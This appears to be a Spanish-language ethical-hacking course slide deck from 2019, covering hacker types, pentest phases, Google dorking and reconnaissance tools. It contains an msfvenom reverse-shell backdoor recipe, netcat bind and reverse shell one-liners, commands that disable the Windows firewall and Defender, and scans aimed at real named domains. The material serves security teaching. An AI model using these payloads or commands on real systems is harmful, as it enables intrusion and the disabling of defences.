0% encontró este documento útil (0 votos)
245 vistas119 páginas

UISEK - CIBERSEGURIDAD - Ecforensics CIBERDELITOS - Julio 2019

El documento presenta a Luis Fabián Hurtado Vargas, un experto en seguridad informática y forense digital. Se detallan sus credenciales académicas y certificaciones, su experiencia como instructor y los casos importantes en los que ha participado. También incluye una lista de temas a tratar en una capacitación sobre hacking ético y seguridad digital.

Cargado por

Carlos Note
Derechos de autor
© © All Rights Reserved
Nos tomamos en serio los derechos de los contenidos. Si sospechas que se trata de tu contenido, reclámalo aquí.
Formatos disponibles
Descarga como PDF, TXT o lee en línea desde Scribd
0% encontró este documento útil (0 votos)
245 vistas119 páginas

UISEK - CIBERSEGURIDAD - Ecforensics CIBERDELITOS - Julio 2019

El documento presenta a Luis Fabián Hurtado Vargas, un experto en seguridad informática y forense digital. Se detallan sus credenciales académicas y certificaciones, su experiencia como instructor y los casos importantes en los que ha participado. También incluye una lista de temas a tratar en una capacitación sobre hacking ético y seguridad digital.

Cargado por

Carlos Note
Derechos de autor
© © All Rights Reserved
Nos tomamos en serio los derechos de los contenidos. Si sospechas que se trata de tu contenido, reclámalo aquí.
Formatos disponibles
Descarga como PDF, TXT o lee en línea desde Scribd
Está en la página 1/ 119

Fabián Hurtado V.

Perito Informático Forense Judicial


Magíster en Seguridad Telemática
Ingeniero de Sistemas Computacionales
Formador de Peritos Forenses Judiciales

Instructor Cisco CCNA – Cisco CCNA SECURITY – Cisco IT ESSENTIALS – EH - Forensics


EcCouncil CEH - Linux Security – Especialista en Seguridades – Cybersecurity
Perito Informático CJ - Computer Forensics Expert
FORMADOR DE PERITOS INFROMÁTICOS FORENSES JUDICIALES
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Temas a tratar
1. Hackers…Son los enemigos?
2. Hacking con Buscadores
3. Ataques hacia servicios del lado cliente y el servidor
4. Powershell hacking
5. Ataques de ingeniería social
6. Backdoring – creación de archivos maliciosos
7. Persistencia – la amenaza jamás se elimina
8. Phishing
9. Esteganografía, ocultar exploits dentro de archivos office, imagen.
10. Envenenamiento de archivos ejecutables
11. Hacking Android
12. Ataques de DDoS
13. Ataques XSS

Instructor Cisco CCNA – Cisco CCNA SECURITY – Cisco IT ESSENTIALS – EH - Forensics


EcCouncil CEH - Linux Security – Especialista en Seguridades – Cybersecurity
Perito Informático CJ - Computer Forensics Expert
FORMADOR DE PERITOS INFROMÁTICOS FORENSES JUDICIALES

Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Ing. Luis Fabián Hurtado Vargas, MGS

• Ecforensics, CEO.
• Magister en Seguridad Telemática, ESPOCH
• Ingeniero en Sistemas Computacionales, UEES
• Licenciado en Sistemas de Información Gerencial, UEES
• Diplomado en Administración de Redes, UEES
• Tecnólogo en Informática, TES
• Técnico Superior en Electrónica, ITSB

Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Ing. Luis Fabián Hurtado Vargas,
MGS

Certificaciones y Acreditación Judicial


• EcCouncil CEH • ITIL v3
• Linux Security • Cisco CCNA
• Especialista en Seguridades • Cisco CCNA Security
• Perito Informático CJ • Cisco IT Essentials
• Computer Forensics Expert • TOEFL
• Computer Forensics Researcher
• Computer Forensics Analyzer
• Cybersecurity

Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Ing. Luis Fabián Hurtado Vargas, MGS
Instructor para academias y universidades
23 años experiencia.
• UISEK
• UTA
• UTC
• UTE
• ESPOCH
• CEDIA
• NEW HORIZONS
• UIDE
• UPS
• UEES
• CENTRO TECNOLOGICO NAVAL

Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Casos importantes a nivel nacional

• UISEK
• Coordinator de la 1era. Maestría en Ciberseguridad del país.

• FISCALIA GENERAL DEL ESTADO


• Especialista de Seguridades de la Información. (2016-2017)
• Asesor de Seguridad Informática del señor Fiscal General del Estado
• Miembro de la Red Iberoamericana de Cibercrimen AIAMP – Portugal Oct. 2016
• Miembro del cuerpo de inteligencia y seguridad nacional
• Analista Investigador de Delitos Informáticos
• Jefe de Infraestructura

• INSTITUCIONES VARIAS
Jefe del TI – Consejo de la Judicatura
Analista de Redes e incidentes - APG
Técnico de Redes
Programador

Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Casos importantes a nivel nacional

• Irregularidades Laborales
• Fraude Bancario
• Ingeniería Social Phishing
• Injurias
• Estafa
• Extorción
• Suplantación de Identidad
• Explotación Sexual de menores

Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
¿PORQUE ES IMPORTANTE EL
ESTUDIO DE EH?

Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Para verificar que nuestra infraestructura de casa/corporativa sea segura.
Para asegurar nuestros propios entornos tecnológicos.
Oportunidades de mejoramiento profesional (una de las 10 mejores
pagadas).
Aumentar la conciencia de seguridad.

Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Los mejores
pagados

Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Existe el termino HACKER?

Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
…según el RFC 1392, hacker es Un
a persona que se deleita en tener total comprensión
del funcionamiento interno de un sistema, computad
oras y redes en particular.

Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Qué es PENTESTING

Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
• Ganar acceso de forma no autorizada a cualquier cosa.
• Ver o interactuar con información que no se tiene permiso.
• Es una serie de pruebas controladas, con el objetivo de
encontrar vulnerabilidades en un sistema para su mitigación.

Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Riesgos de
seguridad

Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
• Extorsión cibernética
• Redes zombie.
• Exploits en nueva tecnología
• Redes sociales
• Virtualización y cómputo

Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
 Black Hat Hacker
Descubren cosas nuevas.
No cumplen reglas.
Asume retos.
Experimentan cosas nuevas.
Están muy expuestos.

Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
 White Hat Hacker
Buenas personas.
No usan sus habilidades para
propósitos ilegales.
Expertos en seguridad inform
ática los cuales ayudan a
proteger de BHH.
Contratados, en nomina.
Cuidan de Ingeniería Social.

Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
• El término “Gray Hat Hacker" se refiere a un hacker
informático o un experto en seguridad informática que a
veces puede violar leyes o estándares éticos típicos, pero
no tiene la intención maliciosa típica de un hacker de
sombrero negro.
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Phreaker
Vulneran teléfonos y pto. 5060, centrales telefónicas

Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Clave de sonidos telefónicos
https://vimeo.com/112783389

Tsutomu Shimomura
Kevin Mitnick

Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
CRACKER
Cracker (no confundir con las galletas)
Vende información en Deep Web
Descubren vulnerabilidades y vende la solu
ción a empresa.

Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Script-kiddie
Recién comienza, no profesionales, siguen
un libreto, no crean.

Lammer
Ego
Fanfarrones
No saben mucho
Chiripa!
Newbie
Novato que tropieza con una pagina web
sobre hacking y baja todas los programas
a la pc, lee y ejecuta.
Es muy Inofensivo.
Hacktivistas
Hackean por motivación social, defensa del
consumidor, ingreso a la política, venganza.

Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
El grooming (en español «acicalar») es una serie de conductas y
acciones deliberadamente emprendidas por un adulto con el objetivo
de ganarse la amistad de un menor de edad, creando una conexión
emocional con el mismo, con el fin de disminuir las inhibiciones del
niño y poder abusar sexualmente de él. En algunos casos, se puede
buscar la introducción del menor al mundo de la prostitución infantil
o la producción de material pornográfico.

WiKi

Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Caso Real 1

Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
ATAQUES: CATEGORÍAS

Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
ATAQUES: CATEGORÍAS
1. Interrupción: Ataque a la Disponibilidad.
2. Intercepción: Ataque a la Confidencialidad.
3. Modificación: Ataque a la Integridad.
4. Fabricación: Ataque a la Autenticidad.

Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Flujo Normal de la Información

Durante un Flujo Normal de la información, la transf


erencia (de un archivo, región de memoria, cte.) se
hace desde el fuente hacia el destino (otro archivo,
memoria, etc.).

Destino de i
Fuente de inf nformación
ormación
Flujo Normal
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Ataque a la Disponibilidad
• Algo de "valor" en el sistema es destruido o se vuelve
no disponible.
• Ejemplos: destrucción de HW, cortado de una línea
de comunicación, deshabilitación de un FS
(umount).

Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Ataque a la Confidencialidad
• Alguien no autorizado gana acceso sobre algo de valor.
• El "no-autorizado" puede ser una persona, una máquina
o un programa.
• Ejemplos: captura de información en una red, o una
copia no autorizada de archivos.

Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Ataque a la Integridad
• Alguien (o algo) no solo gana acceso sino que también modifica
contenido.
• Ejemplos: cambiar valores en un archivo, alterando un programa
para que se comporte diferente, o modificando un mensaje
transmitido en una red.

Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Ataque a la Autenticidad
• Alguien (o algo) inserta objetos falsos en el sistema.
• Ejemplos: inserción de msgs equivocados en una red o
inserción de registros falsos en un archivo.
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Laboratorio –
antes de
instalarlo…
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
• Un PC robusto: marca con excelente soporte y características de última generación.
• Tarjeta inalámbrica actualizada: realizar ataques, realizar a redes inalámbricas.
• Software probado: Sysinternals, Hiren’s Boot, Kali Linux, Backbox
• Buen enlace de internet: el mejor ancho de banda.
• Comunicaciones anónimas: TOR, Tails, OpenVPN, Opera VPN, Proxies Hide my ass, whois,
whatismyipaddress, etc.
• Encriptación de contenidos: TrueCrypt, VeraCrypt.
• Gestor de contraseñas: Keepass, LastPass, OnePass.
• Cuentas falsas: que parezca real, pruebas de Ing. Social,
usar comunicaciones seguras.
• Windows (Desktop & Server): excelente víctima.

Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Sistemas y
distribuciones para
realizar Auditoria
Informática (EH) y
Análisis Forense

Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
• Kali Linux • Samurai Web Testing Framework
• Network Security • WifiSlax
Toolkit • WifiWay
• Parrot Security OS • Pentoo Linux
• DEFT Forensic Linux
• Black Arch Linux
• CAINE Linux (Forensic)
• BackBox
• BugTraq

Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Hipervisor - Hospedero

Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Usaremos un programa HIPERVISOR para HOSPEDAR máquinas
virtuales.
Virtualizaremos 4 máquinas:

Maquina atacante - Kali Linux 2019.2


Maquina vulnerable - Windows 7 / 10

Las máquinas trabajaran de forma separada dentro de una física.

Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Una
jakeadita… con
Metasploit

Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
1. Crear el payload
msfvenom --platform windows -p windows/meterpreter/reverse_tcp
LHOST=192.168.100.40 LPORT=4444 -f exe -o backdoor.exe
2. Levantar el listener:
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.100.40 <IP KALI>
set lport 4444
exploit
Metodología Pentesting

Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
DIFERENCIAS
ENTRE TEST
DE CAJA

Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Black Box - PTest
Test de Penetración de Seguridad donde el técnico no cuenta con infor
mación sobre el sistema. Refleja de la mejor manera posible un ataque
real. Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI

Es muy frecuente en pruebas de penetración a redes.


Hay que descubrir equipos, sistemas, tecnologías de sitios web, etc.
El CLIENTE solamente proporciona el
nombre de su organización
A considerar:

• DNS

• Puertos
• Servidores Web
• Conexiones seguras
• Sistemas de validación de usuarios
• Intrusión a bases de datos
• Intrusión a intranet
• Servicios en la nube
Alcance de la Evaluación:
• Footprinting
• Scanning
• Enumeración
• Análisis de vulnerabilidades automatizado y procesos manuales.
• Comprobación
• Penetración
• Escalamiento

Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
White Box - PTest
Se entrega la información interna de las empresas.
Proporcionan un mapa de red, firewalls, sistemas operativos, tipos
de autenticación, usuarios, tecnología de sitios web, etc.
Son realizadas generalmente por un equipo interno, pero ahora es
más frecuente asignarlo a un equipo externo.
Se convierte en parte fundamental del ciclo de vida del desarrollo
de software.
No se invierte tiempo en la fase de descubrimiento (fingerprint)

Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
El CLIENTE proporciona una estructura detallada de sus
infraestructura de red.

Evaluaciones a considerar:
• DNS
• Puertos
• Servidores Web
• Conexiones seguras
• Sistemas de validación de usuarios
• Intrusión a bases de datos
• DMZ
• Routers y switches
• Configuraciones de seguridad en servidores.
• Test de fuerza bruta
Alcance de la Evaluación: Acceso Total

Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Gray Box - PTest
Mezcla características de las 2 anteriores.
Test de Penetración de Seguridad donde el técnico cuenta co
n información imitada sobre el sistema.
Se da a conocer alguna información al pentester.
Sirve para profundizar en aquellos puntos críticos del sistema.
Útil para conocer ataques que puede llegar hacer un usuario.
(user and privilegies) a nivel interno.

Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
El CLIENTE proporciona el nombre de su
organización, una estructura interna de sus redes.

Previene ataques internos por parte de


empleados, prevención de espionaje industrial.
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI

Evaluaciones a considerar:
• DNS
• Puertos
• Servidores Web
• Sistemas de validación de usuarios
• Intrusión a intranet
• Servicios en la nube
• Alcance de Evaluación:
• Acceso Total
Stakeholders y búsquedas simples
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI

• Ping • APWG http://www.antiphishing.org/


• traceroute • Phishtank.com
• archive.org • Honeypots maps
• Netcraft-com • Norse - http://map.norsecorp.com/#/
• dnsreports • http://map.norsecorp.com/#/
• Shadowserver.org • http://www.digitalattackmap.com
• Zone-h.org • https://threatmap.checkpoint.com/ThreatPortal/livemap.html
• https://www.shodan.io/ • https://www.fireeye.com/cyber-map/threat-map.html
• Spamhouse.org • http://threatmap.fortiguard.com/
PENTESTING
PHASES

Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI

Los 5 pasos para un


Pentesting
¿y en humano?. . .

Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
1 - Reconocimiento: Introducción a Google Hacking
2 - Escanear: Introducción a nmap
3 - Ganar acceso: Introducción a ataques de fuerza bruta
4 - Mantener acceso: Introducción a backdoors
5 - Eliminar evidencia: Introducción a interpretación de logs

Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
RECONOCIMIENTO

Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
https://www.offensive-security.com/commuity-projects/google-hacking-database/
• Es una fase preparatoria, donde el atacante busca
información acerca de un objetivo, antes de atacar.
• Reconocimiento de un rango de objetivos, puede incluir
a clientes, empleados, operaciones, red y sistemas de
una organización.

Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
El Reconocimiento puede ser …

Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
PASIVO
Incluye información sin interactuar directamente con el objetivo.
Ejemplo: búsqueda en registros públicos.
ACTIVO
Involucra la interacción directa con el destino por cualquier medio.
Ejemplo: a través de llamadas telefónicas, por correo electrónico, etc.

Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
ESCANEO

Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
⚫ Fase de preataque
Cuando el atacante escanea la red por información específica, en base a la información obtenida
durante el reconocimiento.

⚫ Escaneador de puertos.
Puede incluir el uso de dialers, escaneadores de puerto, mapeo de red, sweeping, escaneador de
vulnerabilidad
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
⚫ Extraer información.
Los atacantes extraen información tales como nombres de computadoras, direcciones IP, y
cuentas de usuario para lanzar ataques.
OBTENER
ACCESO

Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
⚫ Se refiere al punto donde el atacante consigue acceso para el OS, aplicaciones o red.

⚫ El atacante puede escalar privilegios para tomar el control del sistema. En el proceso,
los sistemas intermedios que son conectados a éste, también son comprometidos.

⚫ Ejemplos: Crackeo de passwords, denegación de servicios, robo de sesiones, etc.

Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
MANTENER
ACCESO

Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
✓ Es la fase cuando el atacante trata de retener la propiedad del sistema.
✓ El atacante puede evitar que el sistema sea propiedad de otros
atacantes, asegurando el acceso exclusivo con backdoors, rootkits o trojans.
✓ Pueden subir, descargar, o manipular datos, aplicaciones y configuraciones en el
sistema comprometido.
✓ Utilizan el sistema para lanzar más ataques.
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
CUBRIR
HUELLAS

Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI

Se refiere a las tareas realizadas por el atacante para ocultar actos maliciosos.
Las intenciones del atacante incluyen:
1. Continuar el acceso al sistema de la víctima.
2. Permanecer oculto con técnicas como Persistencia o Esteganografía
3. Eliminar las evidencias que podría conducir a su persecución.
El atacante sobrescribe logs de aplicaciones para evitar sospechas.
Powershell Hacking, Netcat, deteniendo
el Firewall y más
Shell Directo
WINDOWS - VÍCTIMA
LINUX - ATACANTE
nc -n -v IP WINDOWS 7777 nc -v -n -l -p 7777 -e cmd.exe

Shell Reverso
nc -n -v -l -p 8888 nc -n -v IP LINUX 8888 -e cmd.exe

cd C:\Windows\system32
netsh advfirewall set allprofiles state off
sc Stop WinDefend
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Footprinting

Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
• En esta fase se consigue:
1. Información del objetivo
2. Dirección
3. Numero de teléfono
4. Ocupación
5. Correos
6. Direcciones ip
7. Listado de personas allegadas
8. Redes sociales
9. Chats

Información de la Red:
1. Intranet, extranet, remoto

Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Ud. Debe
preguntarse…????
• Cuál es la empresa, dirección, a
que se dedica, aparece en Google,
números de teléfono, quienes son
sus empleados?
• Cual es su página de internet?
• Cuáles son las direcciones ip
externas?
• Cuáles son las rutas ip hacia los
servidores web?
• Cuáles son sus cuentas de
correo?
• Cuáles son los proveedores de
servicios externos?

Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Google DORKS : Operadores de
búsqueda
Los operadores de búsqueda de Google son términos de
consulta o símbolos que realizan acciones especiales.
Estos operadores te permiten encontrar lo que buscas de
forma rápida y precisa, ofreciendo control adicional más
allá de la página Búsqueda avanzada.
Esta información puede ser obtenida a través de recursos
públicos, ejecutando utilidades como Whois, NSLookup,
NetCraft, DNS Reports o simplemente buscando
manualmente a través de la Web.

Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
OPERADORES
FORMA
GRÁFICA

Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
SERVICIO PTO
HTTP 80
Puertos a Escanear HTTPS 443
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI SSH 22
FTP 21
SMTP 25
NETBIOS SSN 139
MICROSOFT DS 445
TELNET 23
MS-TERM-SERV 3389
MSRPC 135
NETBIOS 137
SNMP 161
MS-SQL-M 1434
NTP 123
NETBIOS DGM 138
MICROSOFT DS 445
MSRPC 135
DHCPS 67
NETBIOS SSN 139
DNS 53
Operadores
“” : especifica a Google que desea buscar una expresión compuesta de 2 o mas palabras literalmente, escribiendo los
términos a buscar entre comillas. "Belford Monmouth"
AND : Google buscará resultados uniendo las palabras ingresadas, relacionando las mismas. “Autocad AND Ecuador”
“-“ en una búsqueda no muestra lo que está a su derecha.
Site: muestra un dominio especifico.
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI

Filetype: filtra la búsqueda solo por una extensión determinada. filetype:pdf site:fiscalIa.gob.ec , site:hp.com filetype:txt

Allintext: busca una cadena de texto especifica en una página web. allintext:password
Site:Google.com allintext:password

allintitle: busca una cadena de texto especifica en el título de una página web
Allintitle:index of .pdf - Allintitle:index of filetype:pdf - Allintitle:index of hacking filetype:pdf
Intitle: Busca una cadena de texto dentro del título de la web. Intitle:hacking site:sony.com
Inurl: busca una cadena de texto en una url especifica (usan mucho los Defacers)
Inurl:backtrack (busca todo lo relacionado a una url que contenga la palabra) inurl:10000 "Login to Webmin"

Autor: busca escritos por el nombre o cuenta de correo indicada autor:Fabián Hurtado

Cache: accedemos a una web que Google tiene en su cache, por ejemplo, cuando han borrado uno tema y n
o ha pasado mucho tiempo y no se puede accesar, se lo recupera. También sirve como ayuda para que no no
s rastreen. Cache: Microsoft.com (esto no queda registrado)
Link: encontramos links que nos direccionan a los sitios buscados. Link:cisco.com

Site:.net filetype:doc site:.net “index of/root” intitle:"Index of" "Apache/2.4.7 (Ubuntu) Server"
inurl:/proc/self/cwd

Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Herramienta whois
• whois
• whois -H dominio.com
(Google.com, presidencia.gob.ec, etc)
• http://whatismyipaddress.com/

Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS,
según reglas del IEPI – SENADI
FORWARD LOOKUP BRUTEFORCE
REVERSE LOOKUP BRUTE FORCE
• host www.dominio.com
• host ip

Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS,
según reglas del IEPI – SENADI theharvester

theharvester -d DOMINIO -b all


theharvester -d cne.gob.ec -b all
HERAMIENTA DIG – nslookup
dig @8.8.8.8 www.dominio.com
A (Address): Se utiliza para traducir nombres de hosts del dominio a direcciones IP, es
el valor predeterminado. dig www.google.com
AAAA: Devuelve las direciones ipv6 que se encuentren registradas en el dominio.
dig www.google.com NS
ANY (Cualquiera): Toda la información que exista.
CNAME (Canonical Name): Devuelve una lista de alias, si existen para el nombre dig www.google.com mx
verdadero (canonical).
dig www.google.com A
NS (Name Server): Especifica el nombre para un dominio.
MX (Mail Exchange): Especifica el servidor encargado de recibir el correo electrónico dig www.google.com AAAA
para el dominio.
dig www.google.com SOA
PTR (Pointer): Lo inverso del registro A, realiza la traducción de direcciones IP a
nombres de host. dig www.google.com PTR
TXT (Text): Permite extraer información adicional a un dominio.
dig www.google.com CNAME
dig ptr ip (reverse)
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
TODOS LOS DERECHOS RESERVADOS ®2019, QUEDA PROHIBIDA SU REPRODUCCIÓN TOTAL O PARCIAL SIN AUTORIZACIÓN DE
ECFORENSICS, SEGUN REGLAS DEL IEPI - SENADI

Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
DNS
Brutting
dnsmap domino
dnsrecon -d google.com -t std
dnsenum dominio

Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
dmitri – whatweb – nikto
uniscan - joomscan
dmitry -wnseo www.agroscopio.com
dmitry -pbo 184.168.38.1 (puertos abiertos del domino)
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI

• whatweb -- b agroscopio.com (detalles de la creación del dominio)


• nikto -host 184.168.38.1 --port 80 (vulnerabilidades en web servers – metasplotaible2)
• uniscan -u testphp.acunetics.com --qeds
uniscan -u 184.168.38.1 --qeds
• joomscan –u polygraph.com.ec
• owasp-zap (realiza análisis de vulnerabilidades en aplicativos tipo web)
• dnsrecon -d adidas.com -t std (enumeración)
Fuerza Bruta y Diccionario + sparta

Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Este programa es capaz de generar diccionarios de claves en función de diversos parámetros.
Se puede generar un diccionario indicando la longitud mínima y también la longitud máxima, asimismo,
también se puede definir si para crear el diccionario queremos solo utilizar todos los números, símbol
os, letras e incluso por ejemplo podremos definir de usar solo varios números y letras, Crunch se enca
rgará de generar todas las combinaciones.

